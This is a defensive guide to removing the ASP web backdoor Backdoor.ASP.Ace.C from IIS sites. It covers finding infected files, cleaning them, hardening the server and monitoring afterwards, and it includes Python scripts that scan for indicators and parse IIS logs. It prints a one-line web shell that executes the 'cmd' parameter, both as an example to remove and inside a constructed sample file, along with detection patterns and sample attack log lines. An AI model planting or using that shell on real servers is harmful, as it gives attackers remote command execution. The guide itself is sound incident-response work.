Remove Backdoor.ASP.Ace.C

TL;DR

Backdoor.ASP.Ace.C is a malicious script that allows attackers remote access to your website. This guide explains how to remove it, harden your server, and prevent re-infection.

1. Understand the Threat

Backdoor.ASP.Ace.C is typically injected into ASP (Active Server Pages) files on websites running Microsoft IIS web servers. It creates a hidden backdoor allowing attackers to upload files, execute commands, and potentially steal data. F-Secure detects it, but removal usually takes more than an antivirus scan: the script is often obfuscated and embedded inside an otherwise legitimate page, and the weakness that let the attacker plant it (an upload flaw, a stolen password, an unpatched server) is still there after the file is deleted, so cleaning without hardening invites re-infection.

2. Backup Your Website

Important: Before making any changes, create a full backup of your website files and database so you can roll back if a cleanup step breaks the site. Label this backup as post-compromise and keep it separate from your older clean backups: it contains the backdoor and is useful for later analysis, but it must never be the version you restore from.

3. Identify Infected Files

  1. F-Secure Logs: Check your F-Secure logs for the exact file paths where Backdoor.ASP.Ace.C was detected. Note these down carefully; every other step works from this list.
  2. Scan with a Web Scanner: Use an online website scanner (e.g., Sucuri SiteCheck) to look for malicious code patterns in what the site serves. Remote scanners only see the rendered output, not the server-side ASP source, so a backdoor that prints nothing until it receives a command will not show up. Individual suspect files can be checked on VirusTotal, but upload only files that contain no credentials or connection strings.
  3. Manual Inspection: If the logs are unclear or incomplete, manually inspect ASP files in your web directory. Look for unusual code, especially in global.asa, the default page (default.asp, or default.aspx on ASP.NET sites), include files, and any recently modified files. Pay attention to obfuscated code (code that's deliberately hard to read). Sorting by modification time is a good first pass, but do not rely on it alone: attackers can reset timestamps, so compare file contents against a known-clean backup or source control where one exists.

4. Remove the Backdoor

  1. Delete Infected Files: If a file is confirmed as infected and you have a backup that predates the compromise, delete the file from the server and restore the clean version from that backup. Before deleting, copy the infected file somewhere outside the web root so it can be analysed later; what it does tells you what the attacker could reach.
  2. Clean Infected Code (If Necessary): If deleting isn't possible, carefully edit the infected ASP files to remove the malicious code. This is risky if you are not familiar with ASP coding. Look for code that:

    • Calls Execute, ExecuteGlobal, Eval, or ScriptEngine, especially with a value taken from Request.QueryString, Request.Form, or Request.Cookies
    • Creates objects that give the script a shell or raw file access, such as Server.CreateObject("WScript.Shell") or Server.CreateObject("Scripting.FileSystemObject"), or reads and writes files outside the directories the site is expected to use
    • Includes encoded or obfuscated strings (e.g., Base64 blobs, or long chains of Chr() calls joined with &)

Example: Removing a suspicious code block:

<% If Request.QueryString("cmd") <> "" Then Execute(Request.QueryString("cmd")) End If %>

Remove the entire <% ... %> block, then diff the file against the clean backup to confirm nothing else was added.
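The identification steps in section 3 and the code indicators in section 4 can be automated. The following Python script is an added example written for this guide, not a tool from F-Secure or code from the original post: it walks a web root, flags script files whose contents match the indicators listed above, and also reports files modified within the last few days. The extension list, the indicator names and the small sample web root it builds are constructed for illustration; point it at a copy of the site rather than the live server.

```python
import os
import re
import sys
import tempfile
import time
from pathlib import Path

# Extensions IIS hands to the classic ASP / ASP.NET script engines, plus .inc
# include files. Assumed list; add any extension mapped to a script handler on
# your server.
SCRIPT_EXTS = {".asp", ".asa", ".aspx", ".ashx", ".asmx", ".inc"}

# Indicators from the checklist above. The names are labels chosen here, not
# F-Secure detection names.
INDICATORS = {
    # Execute/ExecuteGlobal/Eval fed directly from a request: the shape of the
    # one-line snippet shown above.
    "dynamic-eval-of-request": re.compile(
        r"\b(ExecuteGlobal|Execute|Eval)\s*\(\s*Request\b", re.I),
    # Any dynamic code evaluation at all; rare in legitimate ASP.
    "dynamic-eval": re.compile(r"\b(ExecuteGlobal|Execute|Eval)\s*\(", re.I),
    # COM objects that hand the script a shell or raw file access.
    "shell-or-filesystem-object": re.compile(
        r"CreateObject\s*\(\s*[\"'](WScript\.Shell|Scripting\.FileSystemObject"
        r"|ADODB\.Stream|Shell\.Application)", re.I),
    # A long base64-looking literal (encoded payload).
    "long-base64-literal": re.compile(r"[\"'][A-Za-z0-9+/]{80,}={0,2}[\"']"),
    # Chr(..) & Chr(..) & ... obfuscation of strings.
    "chr-concat-obfuscation": re.compile(
        r"(?:Chr\s*\(\s*\d+\s*\)\s*&\s*){4,}", re.I),
}


def scan_content(text):
    """Return the sorted list of indicator names that match a file's text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root, recent_days=7):
    """Walk a web root and report script files that match an indicator or were
    modified within recent_days. Returns a list of dicts, one per flagged file."""
    root = Path(root)
    cutoff = time.time() - recent_days * 86400
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXTS:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        hits = scan_content(text)
        recent = path.stat().st_mtime >= cutoff
        if hits or recent:
            findings.append({
                "path": path.relative_to(root).as_posix(),
                "indicators": hits,
                "recently_modified": recent,
            })
    return findings


def build_sample_webroot():
    """Write a constructed sample web root to a temporary directory and return it.
    The files are illustrative, not real infected files."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "default.asp").write_text('<% Response.Write("Hello") %>\n', encoding="utf-8")
    (root / "images").mkdir()
    # A one-line backdoor of the form shown above, dropped into an images folder.
    (root / "images" / "x.asp").write_text(
        '<% If Request.QueryString("cmd") <> "" Then '
        'Execute(Request.QueryString("cmd")) End If %>\n', encoding="utf-8")
    (root / "global.asa").write_text(
        '<script language="vbscript" runat="server">\n'
        "Sub Application_OnStart\n"
        '  Set fso = Server.CreateObject("Scripting.FileSystemObject")\n'
        "End Sub\n</script>\n", encoding="utf-8")
    # Make the clean file look old so only its content, not its age, is judged.
    old = time.time() - 30 * 86400
    os.utime(root / "default.asp", (old, old))
    return root


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_webroot()
    for f in scan_tree(target):
        print(f"{f['path']}: indicators={f['indicators']} recent={f['recently_modified']}")
```

Run it as `python scan_asp.py C:\inetpub\wwwroot` (or with no argument to scan the built-in sample). Treat the output as a worklist for manual inspection, not a verdict: a legitimate global.asa may use the FileSystemObject, and a backdoor that only uses obfuscation the patterns do not cover will still need the review described in step 3.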

5. Harden Your Server

  1. Update IIS: IIS is serviced through Windows Update, so apply all pending Windows and IIS security patches and keep the server on a supported Windows version.
  2. Strong Passwords: Use strong, unique passwords for all user accounts and database access, and rotate them now: any credential stored on the compromised server (FTP, admin, connection strings in configuration files) must be treated as exposed.
  3. Disable Unnecessary Features: Disable any unnecessary IIS features or modules that aren't required for your website to function (for example WebDAV or FTP publishing, or the classic ASP engine on a site that only uses ASP.NET).
  4. File Permissions: Grant the application pool identity only the rights it needs. Script directories should be readable but not writable by that identity, and any directory the site must write to (uploads, temp) should have script execution disabled in IIS so that a file dropped there cannot run.
  5. Input Validation: Implement robust input validation on all forms and user inputs, and never pass request data to Execute or Eval, to prevent code injection attacks.
  6. Web Application Firewall (WAF): Consider using a WAF (e.g., Cloudflare, Sucuri) to filter malicious traffic and protect against common web vulnerabilities.

6. Scan Again

After removing the backdoor and hardening your server, run another full scan with F-Secure and any online website scanners to confirm that the infection is completely gone.

7. Monitor Your Website

Regularly monitor your website for suspicious activity. Two signals are especially useful after an incident like this: unexpected changes to files under the web root (file integrity monitoring, or a scheduled comparison against a known-good copy) and unusual traffic in the IIS logs, such as requests to script files that were never linked from the site or query strings that carry code. Consider using a security plugin or service that provides real-time monitoring and alerts.
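The IIS request logs are the quickest way to learn who reached the backdoor and when, which bounds the incident and tells you whether the attacker visited more than once. The Python script below is an added example for this guide, not code from the original post: it parses the W3C extended log format IIS writes by default, flags requests to the file paths F-Secure reported and requests whose cmd parameter carries code (the parameter name is taken from the snippet in section 4), and summarises the result per client address. The log lines embedded in it are constructed for illustration, including the addresses and timestamps.

```python
import re
from urllib.parse import parse_qs

# Constructed sample of an IIS W3C extended log (not a real log). IIS writes one
# space-separated record per request and substitutes "-" for empty fields and
# "+" for spaces inside the user agent, so splitting on spaces is safe.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-05-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-05-01 03:12:44 10.0.0.5 GET /default.asp - 80 - 198.51.100.20 Mozilla/5.0 200 0 0 12
2024-05-01 03:13:01 10.0.0.5 GET /images/x.asp cmd=Response.Write(%22ok%22) 80 - 203.0.113.7 python-requests/2.31 200 0 0 31
2024-05-01 03:13:09 10.0.0.5 POST /images/x.asp - 80 - 203.0.113.7 python-requests/2.31 200 0 0 640
2024-05-01 03:20:15 10.0.0.5 GET /products.asp id=42 80 - 198.51.100.21 Mozilla/5.0 200 0 0 9
2024-05-02 11:02:33 10.0.0.5 GET /images/x.asp cmd=Response.Write(Server.MapPath(%22/%22)) 80 - 203.0.113.7 curl/8.0 200 0 0 58
"""

# Query values that look like ASP/VBScript rather than ordinary data.
CODE_LIKE = re.compile(
    r"(ExecuteGlobal|Execute|Eval|CreateObject|Response\.Write|Server\.)", re.I)


def parse_w3c(text):
    """Parse W3C extended log text into a list of dicts keyed by the #Fields names."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(None, 1)[1].split()
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("data record before #Fields directive")
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # truncated or malformed record; skip rather than misalign
        rows.append(dict(zip(fields, parts)))
    return rows


def query_params(row):
    """Decode cs-uri-query into {name: [values]}; '-' means no query string."""
    q = row.get("cs-uri-query", "-")
    return {} if q == "-" else parse_qs(q, keep_blank_values=True)


def find_backdoor_traffic(rows, known_paths, suspicious_params=("cmd",)):
    """Flag requests to the detected backdoor files and requests that pass
    code-like values in the listed parameters (the snippet above reads 'cmd')."""
    known = {p.lower() for p in known_paths}
    hits = []
    for row in rows:
        reasons = []
        if row["cs-uri-stem"].lower() in known:
            reasons.append("request to detected backdoor file")
        params = query_params(row)
        for name in suspicious_params:
            if any(CODE_LIKE.search(v) for v in params.get(name, [])):
                reasons.append(f"code-like value in parameter {name!r}")
        if reasons:
            hits.append({
                "when": f"{row['date']} {row['time']}",
                "client": row["c-ip"],
                "method": row["cs-method"],
                "stem": row["cs-uri-stem"],
                "reasons": reasons,
            })
    return hits


def summarize_clients(hits):
    """Per client IP: request count plus first and last timestamp, to scope the incident."""
    summary = {}
    for h in hits:
        s = summary.setdefault(
            h["client"], {"requests": 0, "first": h["when"], "last": h["when"]})
        s["requests"] += 1
        s["first"] = min(s["first"], h["when"])
        s["last"] = max(s["last"], h["when"])
    return summary


if __name__ == "__main__":
    hits = find_backdoor_traffic(parse_w3c(SAMPLE_LOG), ["/images/x.asp"])
    for h in hits:
        print(h["when"], h["client"], h["method"], h["stem"], "; ".join(h["reasons"]))
    print(summarize_clients(hits))
```

Feed it the files from the site's log directory (by default under C:\inetpub\logs\LogFiles) together with the paths from the F-Secure detections. The POST records matter as much as the GETs: a backdoor of this kind is usually driven through POST bodies once the attacker has confirmed it works, and the body is not logged, so the earliest request to the file is your best estimate of when the compromise began. If the IIS timestamps are in UTC (the default) convert them before comparing with file modification times.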
